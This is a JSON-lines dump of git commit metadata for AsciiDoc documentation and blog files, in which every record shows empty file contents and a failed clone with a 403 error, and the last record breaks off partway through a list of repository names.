{"commit":"393b551cf5e8f1000f8cc45435cf57e1e34ed444","subject":"Update 2017-10-10-Use-Storage-Service-Securely.adoc","message":"Update 2017-10-10-Use-Storage-Service-Securely.adoc","repos":"wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io","old_file":"_posts\/2017-10-10-Use-Storage-Service-Securely.adoc","new_file":"_posts\/2017-10-10-Use-Storage-Service-Securely.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wushaobo\/wushaobo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2367f59ae40c1393536cb671490075c61ff64727","subject":"create post Unboxing Jack's New Laptop...","message":"create post Unboxing Jack's New Laptop...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Unboxing-Jacks-New-Laptop....adoc","new_file":"_posts\/2018-02-26-Unboxing-Jacks-New-Laptop....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"cb1aae388ca83783909fe4d2952e796c8d6514c8","subject":"\u0410\u0443\u0434\u0438\u0442\u043e\u0440\u0438\u0441\u043a\u0430 \u0432\u0435\u0436\u0431\u0430 11","message":"\u0410\u0443\u0434\u0438\u0442\u043e\u0440\u0438\u0441\u043a\u0430 \u0432\u0435\u0436\u0431\u0430 11","repos":"finki-mk\/SP,finki-mk\/SP","old_file":"docs\/src\/sp_av11.adoc","new_file":"docs\/src\/sp_av11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/finki-mk\/SP.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"8427bcbb9de673d07c9d93887a7a5a37c4f29d15","subject":"Added setFaultBody EIP docs","message":"Added setFaultBody EIP docs\n","repos":"zregvart\/camel,cunningt\/camel,gautric\/camel,nicolaferraro\/camel,christophd\/camel,kevinearls\/camel,nicolaferraro\/camel,snurmine\/camel,alvinkwekel\/camel,curso007\/camel,snurmine\/camel,gnodet\/camel,DariusX\/camel,adessaigne\/camel,onders86\/camel,CodeSmell\/camel,pax95\/camel,apache\/camel,onders86\/camel,mcollovati\/camel,gautric\/camel,gautric\/camel,apache\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,sverkera\/camel,zregvart\/camel,alvinkwekel\/camel,tdiesler\/camel,zregvart\/camel,pmoerenhout\/camel,anoordover\/camel,pmoerenhout\/camel,jonmcewen\/camel,tdiesler\/camel,dmvolod\/camel,CodeSmell\/camel,tadayosi\/camel,jonmcewen\/camel,dmvolod\/camel,alvinkwekel\/camel,cunningt\/camel,davidkarlsen\/camel,anoordover\/camel,sverkera\/camel,objectiser\/camel,zregvart\/camel,akhettar\/camel,snurmine\/camel,objectiser\/camel,snurmine\/camel,sverkera\/camel,gnodet\/camel,tadayosi\/camel,adessaigne\/camel,christophd\/camel,gnodet\/camel,ullgren\/camel,nikhilvibhav\/camel,kevinearls\/camel,gautric\/camel,cunningt\/camel,apache\/camel,anoordover\/camel,curso007\/camel,adessaigne\/camel,curso007\/camel,adessaigne\/camel,pax95\/camel,mcollovati\/camel,christophd\/camel,cunningt\/camel,sverkera\/camel,christophd\/camel,gnodet\/camel,ullgren\/camel,nikhilvibhav\/camel,kevinearls\/camel,gautric\/camel,cunningt\/camel,sverkera\/camel,christophd\/camel,gnodet\/camel,tadayosi\/camel,adessaigne\/camel,christophd\/camel,cunningt\/camel,apache\/camel,anoordover\/camel,curso007\/camel,adessaigne\/camel,apache\/camel,pmoerenhout\/camel,akhettar\/camel,pax95\/camel,pmoerenhout\/camel,akhettar\/camel,akhettar\/camel,curso007\/camel,pax95\/camel,mcollovati\/camel,christophd\/camel,jonmcewen\/camel,dmvolod\/camel,snurmine\/camel,jonmcewen\/camel,jonmcewen\/camel,dmvolod\/camel,snurmine\/camel,jamesnetherton\/camel,zregvart\/camel,alvinkwekel\/camel,jamesnetherton\/camel,CodeSmell\/camel,tdiesler\/camel,tadayosi\/camel,jonmcewen\/camel,davidkarlsen\/camel,mcollovati\/camel,DariusX\/camel,CodeSmell\/camel,jamesnetherton\/camel,tadayosi\/camel,anoordover\/camel,gnodet\/camel,ullgren\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,davidkarlsen\/camel,DariusX\/camel,Fabryprog\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,kevinearls\/camel,akhettar\/camel,dmvolod\/camel,snurmine\/camel,objectiser\/camel,zregvart\/camel,pax95\/camel,tdiesler\/camel,cunningt\/camel,sverkera\/camel,gautric\/camel,onders86\/camel,apache\/camel,tdiesler\/camel,onders86\/camel,kevinearls\/camel,pmoerenhout\/camel,adessaigne\/camel,anoordover\/camel,curso007\/camel,Fabryprog\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,objectiser\/camel,Fabryprog\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,onders86\/camel,kevinearls\/camel,tadayosi\/camel,dmvolod\/camel,curso007\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/setFaultBody-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/setFaultBody-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"e7261dcfa093ec9367af797022be254d970c553e","subject":"Equipment list","message":"Equipment list\n\nA test of mixing equipment list as an asciidoc with RG's github website.","repos":"RobotGarden\/RobotGarden.github.io,RobotGarden\/RobotGarden.github.io","old_file":"Equipment.adoc","new_file":"Equipment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RobotGarden\/RobotGarden.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"ea0ee31fe02727c3a237fd3f369f108bc37a4365","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/on_side_effects_of_technology.adoc","new_file":"content\/writings\/on_side_effects_of_technology.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"}
{"commit":"4c5b9c032207caca2068007fc1943736f4f68dde","subject":"[CAMEL-9869] Create Apache Flink Component","message":"[CAMEL-9869] Create Apache Flink Component\n","repos":"jlpedrosa\/camel,pax95\/camel,Fabryprog\/camel,mgyongyosi\/camel,chirino\/camel,bgaudaen\/camel,punkhorn\/camel-upstream,zregvart\/camel,akhettar\/camel,mcollovati\/camel,cunningt\/camel,neoramon\/camel,apache\/camel,borcsokj\/camel,pax95\/camel,ssharma\/camel,adessaigne\/camel,davidkarlsen\/camel,mgyongyosi\/camel,Fabryprog\/camel,tdiesler\/camel,zregvart\/camel,cunningt\/camel,Thopap\/camel,bhaveshdt\/camel,DariusX\/camel,jarst\/camel,CodeSmell\/camel,onders86\/camel,gautric\/camel,christophd\/camel,pmoerenhout\/camel,akhettar\/camel,arnaud-deprez\/camel,yuruki\/camel,nikhilvibhav\/camel,bhaveshdt\/camel,apache\/camel,jkorab\/camel,kevinearls\/camel,FingolfinTEK\/camel,drsquidop\/camel,pkletsko\/camel,driseley\/camel,curso007\/camel,scranton\/camel,tadayosi\/camel,yuruki\/camel,Thopap\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,jonmcewen\/camel,sirlatrom\/camel,RohanHart\/camel,edigrid\/camel,w4tson\/camel,anton-k11\/camel,sabre1041\/camel,acartapanis\/camel,anoordover\/camel,onders86\/camel,chirino\/camel,tdiesler\/camel,nicolaferraro\/camel,edigrid\/camel,alvinkwekel\/camel,zregvart\/camel,anton-k11\/camel,neoramon\/camel,prashant2402\/camel,akhettar\/camel,driseley\/camel,drsquidop\/camel,jonmcewen\/camel,yuruki\/camel,kevinearls\/camel,dmvolod\/camel,jamesnetherton\/camel,bgaudaen\/camel,NickCis\/camel,sirlatrom\/camel,isavin\/camel,Fabryprog\/camel,gautric\/camel,tkopczynski\/camel,mgyongyosi\/camel,jarst\/camel,snurmine\/camel,jarst\/camel,w4tson\/camel,isavin\/camel,prashant2402\/camel,tadayosi\/camel,Thopap\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,sirlatrom\/camel,yuruki\/camel,kevinearls\/camel,dmvolod\/camel,prashant2402\/camel,akhettar\/camel,arnaud-deprez\/camel,yuruki\/camel,YoshikiHigo\/camel,sabre1041\/camel,sverkera\/camel,apache\/camel,jkorab\/camel,bgaudaen\/camel,tlehoux\/camel,veithen\/camel,curso007\/camel,jamesnetherton\/camel,anton-k11\/camel,YoshikiHigo\/camel,sabre1041\/camel,acartapanis\/camel,anoordover\/camel,onders86\/camel,christophd\/camel,pkletsko\/camel,objectiser\/camel,jarst\/camel,jmandawg\/camel,anton-k11\/camel,YoshikiHigo\/camel,sabre1041\/camel,sverkera\/camel,acartapanis\/camel,nikvaessen\/camel,bgaudaen\/camel,tdiesler\/camel,nicolaferraro\/camel,edigrid\/camel,alvinkwekel\/camel,zregvart\/camel,anton-k11\/camel,neoramon\/camel,prashant2402\/camel,akhettar\/camel,driseley\/camel,drsquidop\/camel,jonmcewen\/camel,yuruki\/camel,kevinearls\/camel,dmvolod\/camel,NickCis\/camel,ullgren\/camel,jarst\/camel,w4tson\/camel,isavin\/camel,prashant2402\/camel,tadayosi\/camel,Thopap\/camel,gilfernandes\/camel,gnodet\/camel,sabre1041\/camel,RohanHart\/camel,RohanHart\/camel,cunningt\/camel,adessaigne\/camel,kevinearls\/camel,pkletsko\/camel,RohanHart\/camel,gnodet\/camel,christophd\/camel,pkletsko\/camel,christophd\/camel,pmoerenhout\/camel,jonmcewen\/camel,sirlatrom\/camel,yuruki\/camel,kevinearls\/camel,snurmine\/camel,nikvaessen\/camel,bgaudaen\/camel,tdiesler\/camel,nboukhed\/camel,bhaveshdt\/camel,borcsokj\/camel,bgaudaen\/camel,tdiesler\/camel,yuruki\/camel,nboukhed\/camel,snurmine\/camel,veithen\/camel,oalles\/camel,kevinearls\/camel,cunningt\/camel,onders86\/camel,jamesnetherton\/camel,anton-k11\/camel,mgyongyosi\/camel,jlpedrosa\/camel,ssharma\/camel,Fabryprog\/camel,sverkera\/camel,acartapanis\/camel,nikvaessen\/camel,jkorab\/camel,christophd\/camel,JYBESSON\/camel,gautric\/camel,driseley\/camel,jonmcewen\/camel,nicolaferraro\/camel,gilfernandes\/camel,akhettar\/camel,sirlatrom\/camel,drsquidop\/camel,curso007\/camel,w4tson\/camel,jlpedrosa\/camel,gautric\/camel,JYBESSON\/camel,gnodet\/camel,YoshikiHigo\/camel,nikhilvibhav\/camel,nboukhed\/camel,snurmine\/camel,veithen\/camel,oalles\/camel,kevinearls\/camel,cunningt\/camel,onders86\/camel,jamesnetherton\/camel,lburgazzoli\/apache-camel,hqstevenson\/camel,mcollovati\/camel,hqstevenson\/camel,oalles\/camel,veithen\/camel,pax95\/camel,punkhorn\/camel-upstream,nboukhed\/camel,bhaveshdt\/camel,borcsokj\/camel,bgaudaen\/camel,tdiesler\/camel,yuruki\/camel,nboukhed\/camel,snurmine\/camel,veithen\/camel,veithen\/camel,oalles\/camel,kevinearls\/camel,cunningt\/camel,onders86\/camel,jamesnetherton\/camel,anton-k11\/camel,mgyongyosi\/camel,jlpedrosa\/camel,ssharma\/camel,Fabryprog\/camel,sverkera\/camel,acartapanis\/camel,nikvaessen\/camel,jkorab\/camel,christophd\/camel,JYBESSON\/camel,gautric\/camel,driseley\/camel,jonmcewen\/camel,nicolaferraro\/camel,gilfernandes\/camel,akhettar\/camel,sirlatrom\/camel,drsquidop\/camel,curso007\/camel,nboukhed\/camel,snurmine\/camel,lburgazzoli\/camel,chirino\/camel,sverkera\/camel,ssharma\/camel,nikvaessen\/camel,allancth\/camel,dmvolod\/camel,NickCis\/camel,ullgren\/camel,jonmcewen\/camel,adessaigne\/camel,acartapanis\/camel,curso007\/camel,nicolaferraro\/camel,nikvaessen\/camel,cunningt\/camel,tlehoux\/camel,davidkarlsen\/camel,w4tson\/camel,jkorab\/camel,borcsokj\/camel,anoordover\/camel,chirino\/camel,pkletsko\/camel,oalles\/camel,pax95\/camel,RohanHart\/camel,gnodet\/camel,lburgazzoli\/camel,sverkera\/camel,alvinkwekel\/camel,nboukhed\/camel,CodeSmell\/camel,tkopczynski\/camel,lburgazzoli\/apache-camel,onders86\/camel,rmarting\/camel,edigrid\/camel,jmandawg\/camel,apache\/camel,yuruki\/camel,borcsokj\/camel,tkopczynski\/camel,jkorab\/camel,lburgazzoli\/apache-camel,christophd\/camel,christophd\/camel,pmoerenhout\/camel,sverkera\/camel,jarst\/camel,Thopap\/camel,gilfernandes\/camel,bhaveshdt\/camel,gautric\/camel,adessaigne\/camel,tlehoux\/camel,borcsokj\/camel,rmarting\/camel,driseley\/camel,anoordover\/camel,pax95\/camel,FingolfinTEK\/camel,sirlatrom\/camel,nikhilvibhav\/camel,arnaud-deprez\/camel,bgaudaen\/camel,isavin\/camel,YoshikiHigo\/camel,ullgren\/camel,Thopap\/camel,ullgren\/camel,tdiesler\/camel,anoordover\/camel,driseley\/camel,gautric\/camel,jamesnetherton\/camel,veithen\/camel,nicolaferraro\/camel,drsquidop\/camel,jamesnetherton\/camel,arnaud-deprez\/camel,borcsokj\/camel,nboukhed\/camel,hqstevenson\/camel,mcollovati\/camel,neoramon\/camel,curso007\/camel,FingolfinTEK\/camel,CodeSmell\/camel,ssharma\/camel,DariusX\/camel,lburgazzoli\/camel,jmandawg\/camel,CodeSmell\/camel,jamesnetherton\/camel,rmarting\/camel,rmarting\/camel,NickCis\/camel,w4tson\/camel,jlpedrosa\/camel,isavin\/camel,nikvaessen\/camel,acartapanis\/camel,curso007\/camel,lburgazzoli\/apache-camel,veithen\/camel,jmandawg\/camel,yuruki\/camel,tlehoux\/camel,akhettar\/camel,driseley\/camel,jlpedrosa\/camel,nikhilvibhav\/camel,YoshikiHigo\/camel,objectiser\/camel,davidkarlsen\/camel,sverkera\/camel,anton-k11\/camel,dmvolod\/camel,akhettar\/camel,gilfernandes\/camel,jmandawg\/camel,NickCis\/camel,tadayosi\/camel,chirino\/camel,lburgazzoli\/camel,chirino\/camel,jarst\/camel,lburgazzoli\/apache-camel,drsquidop\/camel,tlehoux\/camel,isavin\/camel,pmoerenhout\/camel,hqstevenson\/camel,sirlatrom\/camel,scranton\/camel,dmvolod\/camel,anoordover\/camel,ssharma\/camel,mgyongyosi\/camel,pmoerenhout\/camel,cunningt\/camel,christophd\/camel,arnaud-deprez\/camel,w4tson\/camel,kevinearls\/camel,scranton\/camel,edigrid\/camel,YoshikiHigo\/camel,gilfernandes\/camel,tdiesler\/camel,sabre1041\/camel,allancth\/camel,FingolfinTEK\/camel,isavin\/camel,tadayosi\/camel,alvinkwekel\/camel,jonmcewen\/camel,oalles\/camel,anoordover\/camel,dmvolod\/camel,dmvolod\/camel,neoramon\/camel,salikjan\/camel,apache\/camel,JYBESSON\/camel,prashant2402\/camel,edigrid\/camel,onders86\/camel,gnodet\/camel,oalles\/camel,anton-k11\/camel,prashant2402\/camel,JYBESSON\/camel,jkorab\/camel,onders86\/camel,gnodet\/camel,DariusX\/camel,alvinkwekel\/camel,ullgren\/camel,bgaudaen\/camel,DariusX\/camel,allancth\/camel,tadayosi\/camel,ssharma\/camel,scranton\/camel,pmoerenhout\/camel,NickCis\/camel,Thopap\/camel,tadayosi\/camel,Thopap\/camel,scranton\/camel,objectiser\/camel,lburgazzoli\/camel,jlpedrosa\/camel,pkletsko\/camel,lburgazzoli\/camel,edigrid\/camel,snurmine\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,kevinearls\/camel,NickCis\/camel","old_file":"components\/camel-flink\/src\/main\/docs\/flink.adoc","new_file":"components\/camel-flink\/src\/main\/docs\/flink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"1053750d443f1445109efc055dc19e2720cb9b16","subject":"Update 2015-03-03-1500-Le-Sport.adoc","message":"Update 2015-03-03-1500-Le-Sport.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-03-03-1500-Le-Sport.adoc","new_file":"_posts\/2015-03-03-1500-Le-Sport.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e17d4e3fbdfa75b8c969f0560c30a82536d3dde1","subject":"Update 2017-07-07-Cloud-Spanner.adoc","message":"Update 2017-07-07-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"3bdfc07cb37b46298f77e14ea78ed0ffb2c5b378","subject":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","message":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"9428da555b95d7aab6e8d9ae5bb2c1cd565d07c2","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"13a30873eb23a37b0a664ea1c27f608d3d54fef7","subject":"Added Proximity integration guide","message":"Added Proximity integration guide\n","repos":"mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh","old_file":"docs\/integrating_w_SD_apps.adoc","new_file":"docs\/integrating_w_SD_apps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrquincle\/nRF51-ble-bcast-mesh.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"}
{"commit":"5d336a5b1ca8f42c2c4b119f43f8ef9c4643af32","subject":"Update 2016-08-05-Eureka.adoc","message":"Update 2016-08-05-Eureka.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-08-05-Eureka.adoc","new_file":"_posts\/2016-08-05-Eureka.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"151cd36cd9d69c3202d0cba893058c3d7bdd6be9","subject":"Add reference page for cljs.main","message":"Add reference page for cljs.main\n","repos":"clojure\/clojurescript-site","old_file":"content\/reference\/repl-and-main.adoc","new_file":"content\/reference\/repl-and-main.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"}
{"commit":"9f6281d61afdfda0c42078d823b1157a4e0d07db","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"1767abc6b30276613817fb889b25839dd2564c78","subject":"Update 2016-11-14-Hacking-al-dia-141116.adoc","message":"Update 2016-11-14-Hacking-al-dia-141116.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-14-Hacking-al-dia-141116.adoc","new_file":"_posts\/2016-11-14-Hacking-al-dia-141116.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Port666\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"669def57c79c9064015b74af18e0c61ef9c5c878","subject":"Update 2016-08-12-Final-Week-Time-to-wrap-up.adoc","message":"Update 2016-08-12-Final-Week-Time-to-wrap-up.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-08-12-Final-Week-Time-to-wrap-up.adoc","new_file":"_posts\/2016-08-12-Final-Week-Time-to-wrap-up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"000705a0932b4363280da874902a0eec68ed7771","subject":"job #11949 - Analysis Note","message":"job #11949 - Analysis Note\n","repos":"xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11949_GD_CTXT_fix\/11949_GD_CTXT_fix_ant.adoc","new_file":"doc-bridgepoint\/notes\/11949_GD_CTXT_fix\/11949_GD_CTXT_fix_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"5a5e42e20c0968a342d15aec60379832b6dfce30","subject":"Update 2018-09-10-Go.adoc","message":"Update 2018-09-10-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Go.adoc","new_file":"_posts\/2018-09-10-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"aa0540b04f1c3d7163cf07bd6cc6d89ba79aec89","subject":"added threading doc","message":"added threading doc","repos":"apaolini\/nagios-plugin-jbossas7,aparnachaudhary\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7","old_file":"threading.asciidoc","new_file":"threading.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/nagios-plugin-jbossas7.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"48a1c74b680359f583545ea16f243c18e404d27d","subject":"y2b create post i-CON 3DS Aluminum Case Unboxing \\u0026 Review","message":"y2b create post i-CON 3DS Aluminum Case Unboxing \\u0026 Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-28-iCON-3DS-Aluminum-Case-Unboxing-u0026-Review.adoc","new_file":"_posts\/2011-03-28-iCON-3DS-Aluminum-Case-Unboxing-u0026-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"8d186c028a4d40c4fe9dcfc06a48e2b3d1351140","subject":"Added JSON Xstream Dataformat docs to Gitbook","message":"Added JSON Xstream Dataformat docs to Gitbook\n","repos":"hqstevenson\/camel,lburgazzoli\/apache-camel,yuruki\/camel,scranton\/camel,anton-k11\/camel,mgyongyosi\/camel,bhaveshdt\/camel,driseley\/camel,akhettar\/camel,veithen\/camel,anton-k11\/camel,isavin\/camel,ssharma\/camel,tdiesler\/camel,hqstevenson\/camel,bgaudaen\/camel,allancth\/camel,jkorab\/camel,snurmine\/camel,nboukhed\/camel,onders86\/camel,ssharma\/camel,lburgazzoli\/camel,nboukhed\/camel,sverkera\/camel,tdiesler\/camel,RohanHart\/camel,neoramon\/camel,bgaudaen\/camel,kevinearls\/camel,adessaigne\/camel,jarst\/camel,jamesnetherton\/camel,lburgazzoli\/camel,ullgren\/camel,jamesnetherton\/camel,bgaudaen\/camel,anoordover\/camel,w4tson\/camel,objectiser\/camel,sirlatrom\/camel,rmarting\/camel,tdiesler\/camel,neoramon\/camel,tkopczynski\/camel,CodeSmell\/camel,mcollovati\/camel,apache\/camel,sverkera\/camel,davidkarlsen\/camel,zregvart\/camel,nboukhed\/camel,ullgren\/camel,akhettar\/camel,pax95\/camel,prashant2402\/camel,rmarting\/camel,hqstevenson\/camel,pax95\/camel,nicolaferraro\/camel,objectiser\/camel,sverkera\/camel,Thopap\/camel,tlehoux\/camel,acartapanis\/camel,zregvart\/camel,nboukhed\/camel,ullgren\/camel,apache\/camel,RohanHart\/camel,gnodet\/camel,lburgazzoli\/camel,prashant2402\/camel,anoordover\/camel,allancth\/camel,bgaudaen\/camel,bhaveshdt\/camel,chirino\/camel,kevinearls\/camel,davidkarlsen\/camel,zregvart\/camel,neoramon\/camel,tlehoux\/camel,rmarting\/camel,adessaigne\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,allancth\/camel,sirlatrom\/camel,gnodet\/camel,akhettar\/camel,bhaveshdt\/camel,jamesnetherton\/camel,sirlatrom\/camel,tkopczynski\/camel,jkorab\/camel,curso007\/camel,acartapanis\/camel,pax95\/camel,allancth\/camel,anoordover\/camel,jkorab\/camel,drsquidop\/camel,pkletsko\/camel,neoramon\/camel,scranton\/camel,alvinkwekel\/camel,sverkera\/camel,gilfernandes\/camel,pax95\/camel,apache\/camel,yuruki\/camel,Thopap\/camel,jonmcewen\/camel,onders86\/camel,cunningt\/camel,anoordover\/camel,apache\/camel,yuruki\/camel,snurmine\/camel,pmoerenhout\/camel,sabre1041\/camel,christophd\/camel,kevinearls\/camel,Thopap\/camel,scranton\/camel,pmoerenhout\/camel,prashant2402\/camel,bgaudaen\/camel,objectiser\/camel,jarst\/camel,snurmine\/camel,nicolaferraro\/camel,isavin\/camel,allancth\/camel,tkopczynski\/camel,sverkera\/camel,lburgazzoli\/